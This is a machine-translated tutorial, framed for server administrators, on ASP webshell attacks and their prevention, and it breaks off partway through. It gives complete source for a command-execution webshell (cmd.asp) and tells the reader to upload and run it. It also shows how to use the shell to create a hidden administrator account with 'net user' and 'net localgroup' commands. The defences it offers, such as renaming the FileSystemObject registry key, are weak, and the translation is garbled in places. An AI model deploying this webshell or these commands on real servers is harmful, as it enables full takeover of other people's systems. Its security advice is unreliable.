Attack and prevention methods are actually very simple, so friends who are familiar with creating web pages and have some CMD commands can learn them. In my opinion, there is not much technical skill, and the difficulty level (elementary level) everyone can learn it, but this tutorial can be used as a WEB Site Server administrator, whether you have years of server management experience or new users, this tutorial serves as a reference for your most effective defense against WEBSHELL attacks and overflow attacks.
I. Basic ASP WEBSHELL attacks and Prevention
The following example describes three web shell attack and prevention methods of ASP (and provides the Webshell source code ):
For example, use a script to bind the CMD command:
This is an attack method that uses scripts to bind the CMD command. In fact, asp webshell does not include this one. Two other webshell attacks and prevention methods will be introduced later. As long as a hacker puts this webshell on your server and you do not have the proper defense method, your server will become a zombie. Generally, the servers affected by this virus are virtual host provider servers, and servers belonging to individuals or companies. How do hackers transmit this webshell to your server? If it is uploaded to the WEB space of the virtual host provider, it is generally carried by the virtual host provider's customer ^ _ ^, because the virtual machine provider's customers themselves have the permission to upload software, the browser address of the http service. The purpose of using this webshell is generally to check what files are stored on the server space you have rented or to steal some important information from the server through this webshell. On an individual or company server, how do hackers upload the webshell to the server space? The vulnerability is usually caused by a script vulnerability on the server, such as a forum or download system, these vulnerabilities allow you to upload files on port 80 on WWW or use the TFTP service to upload the webshell to your server, as we will only explain how these webshells attack, we will not mention how to transfer this webshell to the server space. In this article, we assume that you have transferred this webshell to the server space, you have obtained an http browser address. As long as the server supports asp, you can use this webshell to gain the management right of the server system. This backdoor is very concealed, even if you have reinstalled the system N times, the patch N does not work, because the vulnerability is not patched ^ _ ^, as long as the webshell still exists, when hackers find the WWW address of the webshell, your server will become a zombie, which is extremely harmful.
As shown in, I named a file name CMD. the ASP script WEBSHELL file of ASP is uploaded to a server with the IP address 192.168.0.18. After this file is stored in the webshell folder in the FTP root directory, we can use http: // 192.168.0.18/webshell/cmd. asp address to access this webshell. We can enter all the CMD commands in the blank form, such as the dir c: Command, if you want to create a super user in this server, you can enter two lines of commands, enter net user netpk hacker/add in the first line, and then click the execute CMD command button, A common user netpk is created, and then the second line of command is entered. net localgroup administrators netpk/add adds the created common user netpk to the superuser management-level administrators group, through these, we can determine this websh Ell has the permission to execute all CMD commands. What do you want to do? I don't need to teach you any more.
The source code of the cmd. asp script is attached below:
Run the following command: <br>
<%
Dim oScript
Dim oScriptnet
Dim oFileSys, oFile
Dim szCMD, szTempFile
SzCMD = request. form (". cmd ")
'Get the cmd from the input box.
On Error Resume Next
'If an error occurs, skip this step to prevent the error window from popping up.
Set oScript = server. createobject ("WSCRIPT. SHELL ")
'Create a shell (wshshell) object
Set oFileSys = server. createobject ("scripting. filesystemobject ")
SzTempFile = "C:" & oFileSys. GetTempName ()
'Gettempname () is a method for fso to create a temporary file.
Call oScript. Run ("cmd.exe/c" & szCMD & ">" & szTempFile, 0, true)
'Call the run of the wshshell function to execute the command and redirect it to the Temporary Folder.
Set oFile = oFileSys. OpenTextFile (szTempFile, 1, False, 0)
'Open a temporary file as read
%>
<HTML>
<Body bgcolor = "# C0C0C0" text = "#000000">
<FORM action = "<% = Request. ServerVariables (" URL ") %>" method = "POST">
<Input type = text name = ". CMD" size = 45 value = "<% = szCMD %>">
<Input type = submit value = "execute CMD command" class = input>
</FORM>
<PRE>
<%
On Error Resume Next
Response. write server. HTMLEncode (oFile. ReadAll)
'Output the encoded file content
OFile. close
'Close the file
Call oFileSys. DeleteFile (szTempFile, True)
'Prevent files from being caught, so they are deleted
%>
</Body>
</Html>
You just need to write the above Code in notepad, save the extension as. ASP, and then upload it to your VM space to run it. There are several methods to prevent script attacks bound to CMD commands. If you want to prevent such attacks, you only need to set the FSO (Scripting in ASP. you can delete the FileSystemObject function. to delete the FSO permission, enter the following command at the CMD Command Prompt:
Regsvr32/u c: winntsystem32scrrun. dll
Note: In actual operations, you need to change it to the actual path of the installation directory of your local system. However, this method is also a little too much to delete. If you want to use the FSO permission in the future, that won't work. Therefore, we recommend that you do not use this method to delete the FSO permission,
However, if you do so, no one, including the site system administrator, can use the FileSystemObject object. This is not what the site administrator wants, after all, we can use this object to achieve convenient online platform management. If the system administrator cannot use this object, the loss will be worth the candle, however, if you do not prohibit this dangerous object, it will bring security vulnerabilities to your website. Is there a perfect solution? Yes! The specific method is as follows:
We can prevent others from using the FileSystemObject object illegally, but we can still use this object.
The method is as follows:
Searching Registry
HKEY_CLASSES_ROOTScripting.FileSystemObject key value
Change it to the string you want (right-click --> "RENAME"), for example, change it
HKEY_CLASSES_ROOTScripting.FileSystemObject2
In this way, the object must be referenced in ASP as follows:
Set fso = CreateObject ("Scripting. FileSystemObjectnetpk ")
But cannot use:
Set fso = CreateObject ("Scripting. FileSystemObject ")
If you use the usual method to call the FileSystemObject object, you will not be able to use it.
Haha, as long as you don't tell others the name of the modified object, others cannot use the FileSystemObject object. As a site manager, we can prevent others from illegally using the FileSystemObject object, and we can still use this object to conveniently implement online website management and other functions!
However, this configuration method is not perfect. It simply solves the problem of FSO calling CMD commands and some simple ASP Trojan scripts. You must know that WEBSHELL is not only one of ASP, for example, CGI, PHP, and JSP all have such webshells. If your server is configured with support for CGI, PHP, JSP, and so on at the same time, it will be miserable, because CGI and other webshells can implement webshells without FSO support. So you have to look down, there are some webshells worth your attention.
In fact, there are more simple and practical methods to prevent this webshell that uses ASP scripts to bind CMD commands. It only takes 30 seconds to configure the defense method, after introducing CGI, PHP, JSP, and other webshells, we can prevent these script attacks and overflow attacks as long as we have a defense method, the defense method we introduced at the end is absolutely effective for all webshells we mentioned that can be bound to CMD.
Example 2: WEBSHELL attacks on file management with FSO permission and prevention methods
The following describes the top asp Trojan horse in Haiyang. This WEBSHELL can modify, edit, delete, move, upload, and download arbitrary files on the server online through the web page, as long as the hacker uploads this ASP Trojan to your server, all the files on your server will be controlled by the hacker. What can the hacker do on your server? This is what we mentioned above. Change, delete, move ......
As shown in:
When you see this picture, you can also imagine what will happen to your server at the end. There will be no privacy for the information on your server, if you want to blacklist the home page on your server or delete files on your server, you can click a few clicks. This type of ASP Trojan can be downloaded from various hacker websites, and the source code cannot be written.
Defense method: Like Example 1, we will not repeat it here.
Post: Is it true that the WEBSHELL of ASP is to turn off the FSO object or rename the FSO object in the registry? This is not the case, because there is another kind of ASP trojan that does not require FSO support. Although it is not very powerful, it is necessary to hack into a website, the functions are enough, and such Trojans are difficult to defend against. See example 3.
Example 3: ASP Trojans that can be used without FSO
For the ASP trojan that can be used without FSO, because FSO does not support the image, the function is of course not very powerful. Only by browsing the file directories on the server, copy and move files, and execute program files in the specified path. It is worth noting that most of the current virtual host providers still have this